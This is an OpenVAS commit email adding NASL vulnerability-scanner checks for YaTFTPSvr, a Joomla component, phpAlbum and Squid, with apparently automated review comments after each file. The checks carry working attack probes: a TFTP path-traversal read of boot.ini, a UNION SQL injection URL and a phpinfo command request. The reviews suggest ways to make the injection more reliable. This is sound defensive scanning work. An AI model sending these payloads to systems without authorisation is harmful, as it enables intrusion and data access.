[Openvas-commits] r11911 - in trunk/openvas-plugins: . scripts

scm-commit@wald.intevation.org scm-commit at wald.intevation.org
Tue Nov 1 13:24:21 CET 2011


Author: mime
Date: 2011-11-01 13:24:12 +0100 (Tue, 01 Nov 2011)
New Revision: 11911

Added:
   trunk/openvas-plugins/scripts/gb_YaTFTPSvr_50441.nasl
   trunk/openvas-plugins/scripts/gb_joomla_50451.nasl
   trunk/openvas-plugins/scripts/gb_phpalbum_50437.nasl
   trunk/openvas-plugins/scripts/gb_squid_50449.nasl
Modified:
   trunk/openvas-plugins/ChangeLog
   trunk/openvas-plugins/scripts/deb_570_1.nasl
   trunk/openvas-plugins/scripts/deb_571_1.nasl
Log:
Added new plugins. Fixed risk factor according to CVSS base score.

Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog	2011-11-01 11:52:24 UTC (rev 11910)
+++ trunk/openvas-plugins/ChangeLog	2011-11-01 12:24:12 UTC (rev 11911)
@@ -1,3 +1,15 @@
+2011-11-01  Michael Meyer <michael.meyer at greenbone.net>
+
+	* scripts/gb_squid_50449.nasl,
+	scripts/gb_YaTFTPSvr_50441.nasl,
+	scripts/gb_phpalbum_50437.nasl,
+	scripts/gb_joomla_50451.nasl:
+	Added new plugins.
+
+	* scripts/deb_571_1.nasl,
+	scripts/deb_570_1.nasl:
+	Fixed Risk according to CVSS.
+
 2011-10-31  Michael Meyer <michael.meyer at greenbone.net>
 
 	* scripts/gb_open_site_45709.nasl,

Modified: trunk/openvas-plugins/scripts/deb_570_1.nasl
===================================================================
--- trunk/openvas-plugins/scripts/deb_570_1.nasl	2011-11-01 11:52:24 UTC (rev 11910)
+++ trunk/openvas-plugins/scripts/deb_570_1.nasl	2011-11-01 12:24:12 UTC (rev 11911)
@@ -29,7 +29,7 @@
  script_version("$Revision$");
  script_cve_id("CVE-2004-0599");
  script_tag(name:"cvss_base", value:"5.0");
- script_tag(name:"risk_factor", value:"High");
+ script_tag(name:"risk_factor", value:"Medium");
  name = "Debian Security Advisory DSA 570-1 (libpng)";
  script_name(name);
 
@@ -85,5 +85,5 @@
 }
 
 if(vuln) {
-    security_hole(0);
+    security_warning(0);
 }

Modified: trunk/openvas-plugins/scripts/deb_571_1.nasl
===================================================================
--- trunk/openvas-plugins/scripts/deb_571_1.nasl	2011-11-01 11:52:24 UTC (rev 11910)
+++ trunk/openvas-plugins/scripts/deb_571_1.nasl	2011-11-01 12:24:12 UTC (rev 11911)
@@ -29,7 +29,7 @@
  script_version("$Revision$");
  script_cve_id("CVE-2004-0599");
  script_tag(name:"cvss_base", value:"5.0");
- script_tag(name:"risk_factor", value:"High");
+ script_tag(name:"risk_factor", value:"Medium");
  name = "Debian Security Advisory DSA 571-1 (libpng3)";
  script_name(name);
 
@@ -85,5 +85,5 @@
 }
 
 if(vuln) {
-    security_hole(0);
+    security_warning(0);
 }

Added: trunk/openvas-plugins/scripts/gb_YaTFTPSvr_50441.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_YaTFTPSvr_50441.nasl	2011-11-01 11:52:24 UTC (rev 11910)
+++ trunk/openvas-plugins/scripts/gb_YaTFTPSvr_50441.nasl	2011-11-01 12:24:12 UTC (rev 11911)
@@ -0,0 +1,105 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# YaTFTPSvr TFTP Server Directory Traversal Vulnerability
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(103321);
+ script_bugtraq_id(50441);
+ script_version ("$Revision$");
+
+ script_name("YaTFTPSvr TFTP Server Directory Traversal Vulnerability");
+
+desc = "Overview:
+YaTFTPSvr TFTP Server is prone to a directory-traversal vulnerability
+because it fails to sufficiently sanitize user-supplied input.
+
+A remote attacker could exploit this vulnerability using directory-
+traversal strings (such as '../') to upload and download arbitrary
+files outside of the TFTP server root directory. This could help the
+attacker launch further attacks.
+
+YaTFTPSvr 1.0.1.200 is vulnerable; other versions may also be
+affected.
+
+References:
+http://www.securityfocus.com/bid/50441
+http://sites.google.com/site/zhaojieding2/
+http://www.securityfocus.com/archive/1/520302";
+
+ script_tag(name:"risk_factor", value:"Medium");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2011-11-01");
+ script_description(desc);
+ script_summary("Determine if installed YaTFTPSvr is vulnerable");
+ script_category(ACT_ATTACK);
+ script_family("Remote file access");
+ script_copyright("This script is Copyright (C) 2011 Greenbone Networks GmbH");
+ script_dependencies("find_service.nasl");
+ script_require_ports("Services/udp/tftp");
+ exit(0);
+}
+
+port = get_kb_item("Services/udp/tftp");
+
+if(!port){
+    port = 69;
+}
+
+if(!get_port_state(port))exit(0);
+
+file = "../../../../../../../../../../../../../../boot.ini";
+
+req = '\x00\x01'+file+'\0netascii\0';
+sport = rand() % 64512 + 1024;
+
+ip = forge_ip_packet(ip_hl:5, ip_v:4, ip_tos:0, ip_len:20, ip_off:0, ip_ttl:64, ip_p:IPPROTO_UDP, ip_src: this_host());
+u = forge_udp_packet(ip:ip, uh_sport: sport, uh_dport:port, uh_ulen:8 + strlen(req), data:req);
+
+filter = 'udp and dst port ' + sport + ' and src host ' + get_host_ip() + ' and udp[8:1]=0x00';
+
+for (i = 0; i < 2; i ++) {
+
+  rep = send_packet(u, pcap_active:TRUE, pcap_filter:filter);
+
+  if(rep) {
+
+    data = get_udp_element(udp: rep, element:"data");
+    if (data[0] == '\0' && data[1] == '\x03') {
+
+       c = substr(data, 4);
+
+       if("[boot loader]" >< c) {
+         security_warning(port:port); 
+	 exit(0);
+       }	 
+
+    }  
+
+  }  
+
+}  
+
+exit(0);
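Review bot: The positive branch at `security_warning(port:port); exit(0);` leaves the TFTP transfer open: the RRQ is answered with DATA block 1, nothing is ACKed or aborted, so the server will keep retransmitting that block until its own timeout. Send a TFTP ERROR (opcode 5) back to the responding TID before exiting, e.g. `err = '\x00\x05\x00\x00aborted\0';` / `tid = get_udp_element(udp:rep, element:"uh_sport");` / `send_packet(forge_udp_packet(ip:ip, uh_sport:sport, uh_dport:tid, uh_ulen:8 + strlen(err), data:err), pcap_active:FALSE);` — the reply's own source port must be used because a TFTP server answers from a fresh TID, which is also why the pcap filter correctly matches on dst port only rather than on port 69. The `data[0] == '\0' && data[1] == '\x03'` test assumes at least two payload bytes and `substr(data, 4)` assumes four; a `if(strlen(data) < 4) continue;` guard before it avoids indexing a short datagram. The Overview promises both upload and download, but the probe only exercises the read (RRQ) side; the description should say so, e.g. `Note: this check only verifies the download (RRQ) path.`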


Property changes on: trunk/openvas-plugins/scripts/gb_YaTFTPSvr_50441.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision Date

Added: trunk/openvas-plugins/scripts/gb_joomla_50451.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_joomla_50451.nasl	2011-11-01 11:52:24 UTC (rev 11910)
+++ trunk/openvas-plugins/scripts/gb_joomla_50451.nasl	2011-11-01 12:24:12 UTC (rev 11911)
@@ -0,0 +1,86 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Joomla! Alameda Component 'storeid' Parameter SQL Injection Vulnerability
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(103323);
+ script_bugtraq_id(50451);
+ script_version ("$Revision$");
+
+ script_name("Joomla! Alameda Component 'storeid' Parameter SQL Injection Vulnerability");
+
+desc = "Overview:
+The Alameda component for Joomla! is prone to an SQL-injection
+vulnerability because it fails to sufficiently sanitize user-supplied
+data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the
+application, access or modify data, or exploit latent vulnerabilities
+in the underlying database.
+
+References:
+http://www.securityfocus.com/bid/50451
+http://www.blueflyingfish.com/alameda/
+http://www.joomla.org";
+
+ script_tag(name:"risk_factor", value:"Medium");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2011-11-01");
+ script_description(desc);
+ script_summary("Determine if installed Joomla is vulonerable");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2011 Greenbone Networks GmbH");
+ script_dependencies("joomla_detect.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("host_details.inc");
+include("http_keepalive.inc");
+include("version_func.inc");
+   
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+
+if(!can_host_php(port:port))exit(0);
+
+if(!dir = get_dir_from_kb(port:port,app:"joomla"))exit(0);
+   
+url = string(dir, "/index.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+select+0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374--"); 
+
+if(http_vuln_check(port:port, url:url,pattern:"OpenVAS-SQL-Injection-Test")) {
+     
+  security_warning(port:port);
+  exit(0);
+
+}
+
+
+exit(0);
+
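Review bot: The injection payload at `storeid=-1+union+all+select+0x...--` ends in a bare `--`; MySQL only treats `--` as a comment when it is followed by whitespace, so if the component appends anything to the query the terminator may not take effect and the probe silently reports a false negative — the customary robust spelling in a URL is `--+` (or `-- -`). The marker is sent hex-encoded so that a page merely echoing the parameter back cannot match `OpenVAS-SQL-Injection-Test`, which deserves a one-line comment above the `url =` assignment, e.g. `# marker is hex-encoded so a reflected parameter cannot trigger the pattern match`. A single-column UNION only succeeds when the original SELECT has one column, so a non-match is not proof of absence; worth noting in the summary. `script_summary` has a typo: `vulonerable` should be `vulnerable`. Unlike the `deb_*` scripts touched in this same commit, none of the new scripts carry a `cvss_base` tag, so the `Medium` risk_factor here is not backed by a recorded score.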


Property changes on: trunk/openvas-plugins/scripts/gb_joomla_50451.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision Date

Added: trunk/openvas-plugins/scripts/gb_phpalbum_50437.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_phpalbum_50437.nasl	2011-11-01 11:52:24 UTC (rev 11910)
+++ trunk/openvas-plugins/scripts/gb_phpalbum_50437.nasl	2011-11-01 12:24:12 UTC (rev 11911)
@@ -0,0 +1,95 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# phpAlbum Multiple Security Vulnerabilities
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(103322);
+ script_bugtraq_id(50437);
+ script_version ("$Revision$");
+
+ script_name("phpAlbum Multiple Security Vulnerabilities");
+
+desc = "Overview:
+phpAlbum is prone to an arbitrary-file-download vulnerability,
+multiple cross-site scripting vulnerabilities, and multiple PHP code-
+injection vulnerabilities because it fails to sufficiently sanitize
+user-supplied data.
+
+An attacker can exploit these issues to execute arbitrary script code
+in the browser of an unsuspecting user in the context of the affected
+site, inject and execute arbitrary malicious PHP code, or download
+arbitrary files within the context of the webserver process.
+
+PhpAlbum 0.4.1.16 is vulnerable; other versions may also be affected.
+
+References:
+http://www.securityfocus.com/bid/50437
+http://www.phpalbum.net/dw";
+
+ script_tag(name:"risk_factor", value:"High");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2011-11-01");
+ script_description(desc);
+ script_summary("Determine if installed phpAlbum is vulnerable");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2011 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("host_details.inc");
+include("http_keepalive.inc");
+   
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+
+if(!can_host_php(port:port))exit(0);
+
+dirs = make_list("/phpalbum","/phpAlbum", "/phpAlbumnet",cgi_dirs());
+
+foreach dir (dirs) {
+   
+  url = string(dir, "/main.php"); 
+
+  if(http_vuln_check(port:port, url:url, pattern:"<title>phpAlbum.net")) {
+
+    url = string(dir, "/main.php?cmd=phpinfo");
+
+    if(http_vuln_check(port:port, url:url, pattern:"<title>phpinfo")) {
+
+      security_hole(port:port);
+      exit(0);
+   
+    }
+  }
+}
+
+exit(0);
+
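Review bot: The confirmation step `url = string(dir, "/main.php?cmd=phpinfo")` executes phpinfo() on the target and matches `<title>phpinfo`; that is acceptable for ACT_ATTACK, but the script should state which of the BID's issues (file download, XSS, PHP code injection) it exercises — if `cmd=phpinfo` is a built-in command of phpAlbum rather than the injection vector, a hit only proves configuration disclosure, not code injection, so either hedge the report text or inject a distinguishable marker instead (not verifiable from this hunk). When `cgi_dirs()` yields `/`, `string(dir, "/main.php")` produces `//main.php`; the customary guard is `if(dir == "/") dir = "";` at the top of the loop body. `script_dependencies("find_service.nes", ...)` names the legacy binary plugin while the other new scripts in this commit depend on `find_service.nasl`; align them. The description also lacks a Solution section, unlike gb_squid_50449.nasl in the same commit.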


Property changes on: trunk/openvas-plugins/scripts/gb_phpalbum_50437.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision Date

Added: trunk/openvas-plugins/scripts/gb_squid_50449.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_squid_50449.nasl	2011-11-01 11:52:24 UTC (rev 11910)
+++ trunk/openvas-plugins/scripts/gb_squid_50449.nasl	2011-11-01 12:24:12 UTC (rev 11911)
@@ -0,0 +1,87 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Squid Proxy Caching Server CNAME Denial of Service Vulnerability
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(103320);
+ script_bugtraq_id(50449);
+ script_version ("$Revision$");
+
+ script_name("Squid Proxy Caching Server CNAME Denial of Service Vulnerability");
+
+desc = "Overview:
+Squid proxy caching server is prone to a denial-of-service
+vulnerability.
+
+An attacker can exploit this issue to cause an affected application to
+crash, denying service to legitimate users.
+
+Solution:
+Updates are available. Please see the references for more information.
+
+References:
+http://www.securityfocus.com/bid/50449
+http://bugs.squid-cache.org/show_bug.cgi?id=3237
+https://bugzilla.redhat.com/show_bug.cgi?id=750316
+http://permalink.gmane.org/gmane.comp.security.oss.general/6144
+http://www.squid-cache.org/";
+
+ script_tag(name:"risk_factor", value:"High");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2011-11-01");
+ script_description(desc);
+ script_summary("Determine if installed Squid version is vulnerable");
+ script_category(ACT_GATHER_INFO);
+ script_family("Denial of Service");
+ script_copyright("This script is Copyright (C) 2011 Greenbone Networks GmbH");
+ script_dependencies("secpod_squid_detect.nasl");
+ script_require_ports("Services/www","Services/http_proxy",3128,8080);
+ exit(0);
+}
+
+include("http_func.inc");
+include("version_func.inc");
+include("global_settings.inc");
+
+if ( report_paranoia < 2 ) exit(0); # this nvt is prone to FP
+
+port = get_kb_item("Services/http_proxy");
+
+if(!port){
+  exit(0);
+}
+
+if(!vers = get_kb_item(string("www/", port, "/Squid")))exit(0);
+
+if(!isnull(vers)) {
+
+  if(version_is_equal(version:vers, test_version:"3.1.16")) {
+    security_hole(port:port);
+    exit(0);
+  }  
+
+}  
+
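Review bot: `if(!isnull(vers))` is dead code: the preceding `if(!vers = get_kb_item(...))exit(0);` has already exited on any empty or null value, so the inner block can be flattened to the version comparison alone. `script_require_ports` lists `Services/www`, 3128 and 8080, but the body only reads `get_kb_item("Services/http_proxy")` and exits when it is unset, so a Squid that the detection script registered on a plain www port is never checked — either iterate both keys or drop the unused entries from `script_require_ports`. The `report_paranoia < 2` gate is sensible for an exact-version match that cannot tell a patched 3.1.16 from an unpatched one, but the comment should say why rather than just "prone to FP", e.g. `# a vendor-patched 3.1.16 reports the same version string, hence FP-prone`. `version_is_equal(... "3.1.16")` encodes a single affected release; if the referenced advisory lists further affected builds they need adding, which cannot be confirmed from this hunk.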


Property changes on: trunk/openvas-plugins/scripts/gb_squid_50449.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision Date


